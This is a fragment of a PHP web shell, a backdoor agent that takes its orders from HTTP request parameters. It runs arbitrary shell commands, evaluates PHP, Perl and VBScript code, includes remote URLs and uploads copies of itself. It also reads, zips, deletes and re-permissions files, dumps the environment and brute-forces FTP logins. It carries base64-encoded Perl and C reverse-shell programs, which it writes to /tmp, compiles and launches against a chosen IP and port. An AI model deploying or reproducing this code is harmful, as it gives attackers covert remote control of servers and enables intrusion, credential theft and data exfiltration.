compressedData[] = $feedArrayRow; $newOffset = strlen(implode("", $this->compressedData)); $addCentralRecord = "\x50\x4b\x01\x02"; $addCentralRecord .="\x00\x00"; $addCentralRecord .="\x14\x00"; $addCentralRecord .="\x00\x00"; $addCentralRecord .="\x08\x00"; $addCentralRecord .="\x00\x00\x00\x00"; $addCentralRecord .= pack("V",$compression); $addCentralRecord .= pack("V",$compressedLength); $addCentralRecord .= pack("V",$uncompressedLength); $addCentralRecord .= pack("v", strlen($directoryName) ); $addCentralRecord .= pack("v", 0 ); $addCentralRecord .= pack("v", 0 ); $addCentralRecord .= pack("v", 0 ); $addCentralRecord .= pack("v", 0 ); $addCentralRecord .= pack("V", 32 ); $addCentralRecord .= pack("V", $this -> oldOffset ); $this -> oldOffset = $newOffset; $addCentralRecord .= $directoryName; $this -> centralDirectory[] = $addCentralRecord; } function getZippedfile() { $data = implode("", $this -> compressedData); $controlDirectory = implode("", $this -> centralDirectory); return $data. $controlDirectory. $this -> endOfCentralDirectory. pack("v", sizeof($this -> centralDirectory)). pack("v", sizeof($this -> centralDirectory)). pack("V", strlen($controlDirectory)). pack("V", strlen($data)). "\x00\x00"; } } function compress(&$filedump) { global $content_encoding; global $mime_type; if (@function_exists('gzencode')) { $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = @gzencode($filedump); } else { $mime_type = 'application/octet-stream'; } } function make_zip($files) { if (@function_exists('gzcompress')) { $zipfile = new createZip(); foreach ($files as $filename) { $filedump = eat_file($filename); $zipfile->addFile($filedump, $filename); # substr($filename, 0, -4)); } return $zipfile->getZippedfile(); } else { #TODO: use external commands return ''; } } function perms($mode) { if (!$GLOBALS['unix']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } function get_cwd() { global $safe_mode; global $unix; global $HTTP_SERVER_VARS; $res = ''; if (function_exists('getcwd')) { $res = @getcwd(); $res = trim($res); } if (empty($res) && function_exists('posix_getcwd')) { $res = @posix_getcwd(); } if (empty($res) && function_exists('realpath')) { $res = @realpath("."); } if (empty($res) && !$safe_mode) { if ($unix) { $res = command("pwd"); } else { $res = command("cd"); } $res = trim($res); } if (empty($res)) { $selfpath = ''; $selfpath = $HTTP_SERVER_VARS['SCRIPT_FILENAME']; if (empty($selfpath)) $selfpath = $HTTP_SERVER_VARS['PATH_TRANSLATED']; if (empty($selfpath)) $selfpath = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['PHP_SELF']; if (preg_match('/^(.*)[\/\\\\]([^\/\\\\]*)$/', $selfpath, $matches)) { $res = $matches[1]; } else { $res = $selfpath; } } if (empty($res) && $_ENV['PWD']) { $res = $_ENV['PWD']; } return $res; } function get_uname() { $res = ''; global $unix; if (empty($res) && function_exists('php_uname')) { $res = @php_uname(); } if (empty($res) && function_exists('posix_uname')) { $h = @posix_uname(); foreach ($h as $k=>$v) { $res .= "$k=$v "; } } if (empty($res) && !$safe_mode) { if ($unix) { $res = command("uname -a"); } else { $res = command("ver"); } $res = trim($res); } if (empty($res)) { $res = "$_ENV[OSTYPE] $_ENV[OS] $HTTP_SERVER_VARS[SERVER_SOFTWARE]"; } return $res; } function is_unix_os() { $dir = @get_cwd(); $unix = 0; if (strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; if(empty($dir)) { $uname = get_uname(); if (@eregi("win",$uname)) { $unix = 0; } else { $unix = 1; } } return $unix; } function explode_files ($masklist, $open_dirs = false, $insert_dirnames = false) { $masks = preg_split("/(?read()) ) { $result[] = "$cur$file"; } $d->close(); } else { #error opening dir, treating as file $result[] = $cur; } } else { $result[] = $cur; } } } return $result; } function safe_dir($dir, $recursive = false, $recursive_limit = 0) { global $unix; global $fast; $res = ''; if (empty($dir)) $dir = "."; $files = explode_files($dir,true,true); $curdirs = array(); if (!$files) return $res; foreach ($files as $file) { #if ($file=="." || $file=="..") continue; if (@substr($file,-1,1) == ":") { $res .= "$file\n"; continue; } @clearstatcache(); if (function_exists('stat')) list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = @stat("$file"); else { if (!isset($mtime)) $mtime = @filemtime("$file"); if (!isset($uid)) $uid = @fileowner("$file"); if (!isset($gid)) $gid = @filegroup("$file"); if (!isset($inode)) $inode = @fileinode("$file"); if (!isset($size)) $size = @filesize("$file"); } if (!isset($size)) $size = 0; #if(!$unix){ # $res .= date("d.m.Y H:i",$mtime); # if(@is_dir($file)) $res .= " "; else $res .= sprintf("% 8s ",$size); #} #else { $owner = array(); $grpid = array(); if (isset($uid)) { if (function_exists('posix_getpwuid')) $owner = @posix_getpwuid($uid); else $owner['name'] = $uid; } if (empty($owner['name'])) $owner['name'] = '?'; $owner['name'] = trim($owner['name']); if (isset($gid)) { if (function_exists('posix_getgrgid')) $grpid = @posix_getgrgid($gid); else $grpid['name'] = $gid; } if (empty($grpid['name'])) $grpid['name'] = '?'; $grpid['name'] = trim($grpid['name']); $res .= sprintf("% 10d ",$inode); @preg_match('/(^|\/|\\\\)([^\/\\\\]+)$/', $file, $shortname); if ($unix) { $res .= perms(@fileperms("$file")); } else { if (@is_dir($file)) $type = 'd'; elseif (@is_file($file)) $type = '-'; elseif (@is_link($file)) $type = 'l'; elseif ($shortname[2] == "." or $shortname[2] == "..") $type = 'd'; else $type = '?'; $res .= $type; $res .= "rwx---"; if (!$fast) { $read = 0; $write = 0; if ($type == '-') { if ($handle = @fopen($file,"rb")) { $read = 1; fclose ($handle); } if ($handle = @fopen($file,"ab+")) { $write = 1; fclose($handle); } } elseif ($type == 'd') { $unique_name = "$file/87never_exists_anywhere54"; if ($handle = @fopen($unique_name, "w+")) { $write = 1; @fclose($handle); @unlink($unique_name); } if ($handle = @opendir($file)) { $read = 1; @closedir($handle); } } if ($read) $res .= "r"; else $res .= "-"; if ($write) $res .= "w"; else $res .= "-"; $res .= "x"; } else { $res .= "???"; } } $res .= sprintf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grpid['name'],$size); $res .= date("d.m.Y H:i ",$mtime); } $res .= "$shortname[2]\n"; if (@is_dir("$file")) { if ($shortname[2] != "." && $shortname[2] != "..") $curdirs[] = "$file"; } } if ($recursive) { foreach ($curdirs as $dirname) { if ($recursive_limit <= 0) { $res .= "\n"; $res .= safe_dir($dirname, $recursive); } else { if ($recursive_limit > 1) { $res .= "\n"; $res .= safe_dir($dirname, $recursive, $recursive_limit-1); } } } } return $res; } function DirFilesR($dir,$types='') { global $safe_mode; $files = Array(); $mark_as_accessable = 0; if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if (!empty($file) && !$mark_as_accessable) { $mark_as_accessable = 1; $files[] = ''; } if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { if($types) { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } if (!$files && !$safe_mode && !$mark_as_accessable) { $listing = command ("ls -1Ra $dir"); $lines = explode("\n", $listing); $curdir = $dir; foreach ($lines as $line) { $line = trim($line); if (empty($line)) continue; if ($line == "." || $line == "..") continue; if (!$mark_as_accessable) { $mark_as_accessable = 1; $files[] = ''; } if (preg_match("/^(.*):$/",$line,$matches)) { $curdir = $matches[1]; } else { if($types) { $pos = @strrpos($line,"."); $ext = @substr($line,$pos,@strlen($line)-$pos); if(@in_array($ext,explode(';',$types))) $files[] = "$curdir/$line"; } else $files[] = "$curdir/$line"; } } } return $files; } function ReadRegistry($path) { #reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache" } function U_value($value) { if ($value == '') return ''; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return $value; } $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; ##################################################################### if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_REQUEST= &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_GET as $k=>$v) { $_GET[$k] = stripslashes($v); } foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_REQUEST as $k=>$v) { $_REQUEST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if (function_exists('error_reporting')) @error_reporting(0); if (function_exists('set_magic_quotes_runtime')) @set_magic_quotes_runtime(0); if (function_exists('set_time_limit')) @set_time_limit(0); if (function_exists('ini_set')) { @ini_set('max_execution_time',0); @ini_set('output_buffering',0); #TODO: if version 4.2.3 - 4.0.3. # @ini_set('upload_max_filesize',"100M"); # if (@ini_get('file_uploads') == false) @ini_set('file_uploads',true); } global $safe_mode; if (function_exists('ini_get')) { $safe_mode = @ini_get('safe_mode'); } else { $safe_mode = 0; } global $unix; $unix = is_unix_os(); if (function_exists('umask')) { $umask = 0755; } $envelope = isset($_REQUEST['envelope']); ##################################################################### if ($envelope) { echo '__START__9034785902347509238476034857607834__START__'; } global $output; $output = ''; global $compress; $compress = empty($_REQUEST['compress']) ? 0 : $_REQUEST['compress']; global $use_exec; $use_exec = empty($_REQUEST['use_exec']) ? 0 : $_REQUEST['use_exec']; global $fast; $fast = empty($_REQUEST['rfast']) ? 0 : $_REQUEST['rfast']; if (!empty($_REQUEST['not_exec']) && $_REQUEST['not_exec']) $safe_mode = 1; $scmd = empty($_REQUEST['spec']) ? '' : $_REQUEST['spec']; if (empty($scmd)) $scmd = empty($_REQUEST['scmd']) ? '' : $_REQUEST['scmd']; $cfe = empty($_REQUEST['cfe']) ? '' : $_REQUEST['cfe']; if (empty($cfe)) $cfe = empty($_REQUEST['rcmd']) ? '' : $_REQUEST['rcmd']; $ffr = empty($_REQUEST['rfile']) ? '' : $_REQUEST['rfile']; $ffrs = empty($_REQUEST['rfiles']) ? '' : $_REQUEST['rfiles']; $dfr = empty($_REQUEST['rdir']) ? '' : $_REQUEST['rdir']; $dfra = empty($_REQUEST['rdirall']) ? '' : $_REQUEST['rdirall']; $info = empty($_REQUEST['rinfo']) ? '' : $_REQUEST['rinfo']; if (!empty($HTTP_POST_FILES['userfile']['name'])) { if(!empty($_REQUEST['rname'])) { $nfn = $_REQUEST['rname']; } else { $nfn = $HTTP_POST_FILES['userfile']['name']; } $tmp_name = $HTTP_POST_FILES['userfile']['tmp_name']; $tmp_size = $HTTP_POST_FILES['userfile']['size']; $upload_file = @fopen($tmp_name, "rb"); if ($upload_file) $target_file = @fopen($nfn, "wb"); if ($target_file && $upload_file && !$use_exec) { $write_data = @fread($upload_file, $tmp_size); @fwrite($target_file, $write_data); @fclose($target_file); @fclose($upload_file); echo "1\n$nfn upload by fwrite ok"; } else { if ($target_file) @fclose($target_file); if ($upload_file) @fclose($upload_file); if (!$use_exec && @copy($tmp_name, $nfn)) { echo "1\n$nfn upload by copy ok"; } else { $cmd = "cp $tmp_name $nfn 2>&1"; echo "@copy failed. Trying $cmd\n"; $cpres = command($cmd); if (empty($cpres)) { echo "1\n$nfn upload by cp ok"; } else { $cmd = "cat $tmp_name >$nfn"; echo "cp failed. Trying $cmd\n"; $cpres = command($cmd); if (@filesize($nfn) == $tmp_size) { echo "1\n$name upload by cat ok"; } else { echo "0\n$name upload error"; } } } } } if (!empty($scmd)) { if ($scmd == "upload-agent" || $scmd == "upload-data" || $scmd == "upload-url") { $agent = ''; if ($scmd == "upload-agent") { $aagent = @file(__FILE__); $agent = @join("", $aagent); } elseif ($scmd == "upload-data") { $agent = $_REQUEST['data']; } elseif ($scmd == "upload-url") { $agent = @file_get_contents($_REQUEST['rurl']); } if (empty($agent)) { echo "error downloading data\n"; } if (!empty($agent)) { $name = $_REQUEST['rname']; if (empty($name)) { $name = "agent.php"; } $file = ''; if (!$use_exec) $file = @fopen($name,"wb"); if ($file) { @fwrite($file, $agent); @fclose($file); echo "1\n$name upload ok"; } else { print "php file restriction is on\n"; $tmpfname = get_temp_filename(); if ($tmpfile = @fopen($tmpfname, "wb")) { @fwrite($tmpfile, $agent); @fclose($tmpfile); } elseif (!$safe_mode) { echo "can't open for write any temp file $tmpfname\n"; $esc_agent = @escapeshellarg($agent); command("echo $esc_agent >$tmpfname"); } if (!$use_exec && @copy($tmpfname, $name)) { echo "1\n$name upload ok"; } else { if (!$safe_mode) { $cmd = "cp $tmpfname $name 2>&1"; if (!$unix) $cmd = "copy $tmpfname $name"; echo "@copy failed. Trying $cmd\n"; $cpres = command($cmd); if (empty($cpres)) { echo "1\n$name upload ok"; } elseif (!$safe_mode) { $cmd = "cat $tmpfname >$name"; if (!$unix) $cmd = "type $tmpfname >$name"; echo "cp failed. Trying $cmd\n"; $cpres = command($cmd); if (@file_exists($name)) { echo "1\n$name upload ok"; } else { echo "0\n$name upload error"; } } } } @unlink($tmpfname); } } } if ($scmd == "rm") { $masks = $_REQUEST['rname']; if (!empty($masks)) { $files = explode_files($masks); foreach ($files as $file) { if ($use_exec || !@unlink($file)) { if ($unix) { $output .= command("rm -f $file"); } else { $output .= command("del /Q $file"); } } } } } if ($scmd == "cp") { $name1 = $_REQUEST['rname1']; $name2 = $_REQUEST['rname2']; if (!empty($name1) && !empty($name2)) { if ($use_exec || !@copy($name1, $name2)) { if ($unix) { $output .= command("cp -f $name1 $name2"); } else { $output .= command("copy /Y $name1 $name2"); } } } } if ($scmd == "mv") { $name1 = $_REQUEST['rname1']; $name2 = $_REQUEST['rname2']; if (!empty($name1) && !empty($name2)) { if ($use_exec || !@rename($name1, $name2)) { if ($unix) { $output .= command("mv -f $name1 $name2"); } else { $output .= command("move /Y $name1 $name2"); } } } } if ($scmd == "rmdir") { $name = $_REQUEST['rname']; if (!empty($name)) { if ($use_exec || !@rmdir($name)) { $output .= command("rmdir $name"); } } } if ($scmd == "mkdir") { $name = $_REQUEST['rname']; if (!empty($name)) { if ($use_exec || !@mkdir($name)) { $output .= command("mkdir $name"); } } } if ($scmd == "chmod") { $mode = $_REQUEST['rmode']; $masks = $_REQUEST['rname']; if (!empty($masks) && !empty($mode)) { $files = explode_files($masks); foreach ($files as $name) { if ($use_exec || !@chmod($name,$mode)) { $output .= command("chmod $mode $name"); } } } } if ($scmd == "chown") { $owner = $_REQUEST['rowner']; $masks = $_REQUEST['rname']; if (!empty($masks) && !empty($owner)) { $files = explode_files($masks); foreach ($files as $name) { if ($use_exec || !@chown($name,$owner)) { $output .= command("chown $owner $name"); } } } } if ($scmd == "chgrp") { $masks = $_REQUEST['rname']; $grp = $_REQUEST['rgrp']; if (!empty($masks) && !empty($grp)) { $files = explode_files($masks); foreach ($files as $name) { if ($use_exec || !@chgrp($name,$grp)) { $output .= command("chgrp $grp $name"); } } } } if ($scmd == "back-perl") { $rip = $_REQUEST['rip'] ? $_REQUEST['rip'] : $_SERVER['REMOTE_ADDR']; $rport = $_REQUEST['rport'] ? $_REQUEST['rport'] : 11457; create_file_base64("/tmp/back",$back_connect); $p2=which("perl"); $blah = command($p2." /tmp/back $rip $rport &"); } if ($scmd == "back-c") { $rip = $_REQUEST['rip'] ? $_REQUEST['rip'] : $_SERVER['REMOTE_ADDR']; $rport = $_REQUEST['rport'] ? $_REQUEST['rport'] : 11457; create_file_base64("/tmp/back.c",$back_connect_c); $blah = command("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = command("/tmp/backc $rip $rport &"); } if ($scmd == "eval-php") { $code = $_REQUEST['rcode']; if (!empty($code)) { $res = @eval ($code); if ($res) $output = $res; if (!empty($output)) { if ($compress) compress($output); echo $output; } } } if ($scmd == "eval-perl") { $code = $_REQUEST['rcode']; if (!empty($code)) { $p2 = which("perl"); $tmpfname = get_temp_filename(); create_file($tmpfname,$code); $output = command("$p2 $tmpfname"); @unlink($tmpfname); if (!empty($output)) { if ($compress) compress($output); echo $output; } } } if ($scmd == "eval-vbs") { $code = $_REQUEST['rcode']; if (!empty($code)) { $tmpfname = get_temp_filename(); create_file($tmpfname,$code); $output = command("cscript.exe /Nologo /E:Vbscript $tmpfname"); @unlink($tmpfname); if (!empty($output)) { if ($compress) compress($output); echo $output; } } } if ($scmd == "include") { include($_REQUEST['rurl']); } if ($scmd == "search") { $pattern = $_REQUEST['pattern']; $grepmode = !empty($_REQUEST['grepmode']) ? $_REQUEST['grepmode'] : 0; $files = array(); $output = ''; if (!empty($_REQUEST['tdir'])) { $exts = $_REQUEST['exts']; $target = $_REQUEST['tdir']; $files = DirFilesR($target, $exts); } elseif (!empty($_REQUEST['tfile'])) { $files[] = $_REQUEST['tfile']; } if ($files) { foreach ($files as $file) { if (empty($file)) continue; $content = eat_file($file); if (!empty($content)) { if ($grepmode == 0) { if (preg_match("$pattern", $content)) $output .= "$file\n"; } else { $repfile = false; if (preg_match_all("$pattern", $content, $matches, PREG_PATTERN_ORDER)) { if ($grepmode == 2 && !$repfile) { $output .= "~!$file:\n"; $repfile = true; } $tolist = $grepmode == 3 ? $matches[1] : $matches[0]; foreach ($tolist as $match) { if ($grepmode == 1) $output .= "$file:"; $output .= "$match\n"; } } } } } } else { $output = "??? error enumerating target dir/file!\n"; } if ($compress) compress($output); echo $output; } if ($scmd == "ftp-test") { $output = ''; $ftp_server = !empty($_REQUEST['fserver']) ? $_REQUEST['fserver'] : "127.0.0.1"; $ftp_port = !empty($_REQUEST['fport']) ? $_REQUEST['fport'] : 21; $connection = @ftp_connect ($ftp_server,$ftp_port,10); if (!$connection) { $output .= "error connecting to $ftp_server:$ftp_port\n"; } else { @ftp_close($connection); $flogins = explode("\n",$_REQUEST['flogins']); $fpasswords = explode("\n",$_REQUEST['fpasswords']); $found = false; foreach ($flogins as $login) { if (empty($login)) next; foreach ($fpasswords as $password) { if (empty($password)) next; $connection = @ftp_connect($ftp_server,$ftp_port,10); if (!$connection) { $output .= "$login:$password:-1\n"; } else { if (@ftp_login($connection,$login,$password)) { $output .= "$login:$password:1\n"; $found = true; break; } else { $output .= "$login:$password:0\n"; } @ftp_close($connection); } } if ($found) break; } } } if ($compress) compress($output); echo $output; } if (!empty($cfe)) { $output = command($cfe); if ($compress) compress($output); echo $output; } if (!empty($ffr)) { if (!$envelope) { @header("Content-type: application/octet-stream"); @header("Content-disposition: attachment; filename=\"".$ffr."\";"); } $output = eat_file($ffr); if ($compress) compress($output); echo $output; } if (!empty($ffrs)) { if (!$envelope) { @header("Content-type: application/zip"); } $ffrs = trim($ffrs); $files = preg_split("/\s+/", $ffrs, -1, PREG_SPLIT_NO_EMPTY); $output = make_zip($files); echo $output; } if (!empty($dfr)) { if (!$use_exec) { $dfr = trim($dfr); $output .= safe_dir($dfr); } if (!$safe_mode && empty($output)) { if ($unix) { $output .= command("ls -liaL $dfr"); } else { $output .= command("dir /a $dfr"); } } if ($compress) compress($output); echo $output; } if (!empty($dfra)) { $recur_limit = !empty($_REQUEST['rlimit']) ? $_REQUEST['rlimit'] : 0; if (!$use_exec) { $dfra = trim($dfra); $output .= safe_dir($dfra, true, $recur_limit); } if (!$safe_mode && empty($output)) { if ($unix) { $output .= command("ls -liRaL $dfra"); } else { $output .= command("dir /S /a $dfra"); } } if ($compress) compress($output); echo $output; } if (!empty($info)) { $output = ''; switch ($info) { case 'ver': $output = $version; if ($safe_mode) $output .= " (safe mode)"; break; case 'uname': $output = get_uname(); break; case 'id': if (!$safe_mode) { if($unix) { $output = command("id"); } else { $output = command("whoami"); } $output = trim($output); } if (empty($output)) { $found = 0; if (function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); if ($euserinfo || $egroupinfo) { $output = 'uid='.$euserinfo['uid'].'('.$euserinfo['name'].') gid='.$egroupinfo['gid'].'('.$egroupinfo['name'].')'; $found = 1; } } if (!$found) { if (function_exists('get_current_user')) $output .= "user=".@get_current_user(); if (function_exists('getmyuid')) $output .= " uid=".@getmyuid(); if (function_exists('getmygid')) $output .= " gid=".@getmygid(); } } break; case 'pwd': $output = get_cwd(); break; case 'safe-mode': $output = $safe_mode ? '1' : '0'; break; case 'unix-os': $output = $unix ? '1': '0'; break; case 'php-info': $output = @phpinfo(-1); break; case 'php-ini': if (function_exists('ini_get_all')) { foreach (@ini_get_all() as $key=>$value) { $output .= "$key"."".U_value($value['local_value'])."".U_value($value['global_value'])."\n"; } } break; case 'disk': $name = $REQUEST['rname']; if (empty($name)) if ($unix) $name = "/"; else $name = "\\"; $output = @disk_free_space($name)."/".@disk_total_space($name); break; case 'disk-list': for ($disk = 'C'; $disk < 'Z'; ++$disk) { if (@disk_total_space("$disk:")) { $output .= "$disk:\n"; } } break; case 'env': if ($_SERVER) { foreach ($_SERVER as $key=>$value) { $output .= "$key:".U_value($value)."\n"; } } else { global $HTTP_SERVER_VARS; foreach ($HTTP_SERVER_VARS as $key=>$value) { $output .= "$key:".U_value($value)."\n"; } } $cmdenv = ''; if (!$safe_mode) { if ($unix) $cmdenv = command('env'); else $cmdenv = command('set'); } if (!empty($cmdenv)) { $output .= @join(":", split("=", $cmdenv)); } else { if ($_ENV) { foreach ($_ENV as $key=>$value) { $output .= "$key:".U_value($value)."\n"; } } else { global $HTTP_ENV_VARS; foreach ($HTTP_ENV_VARS as $key=>$value) { $output .= "$key:".U_value($value)."\n"; } } } break; } if ($compress) compress($output); echo $output; } if ($envelope) { echo '__STOP__9034785902347509238476034857607834__STOP__'; die; } ?>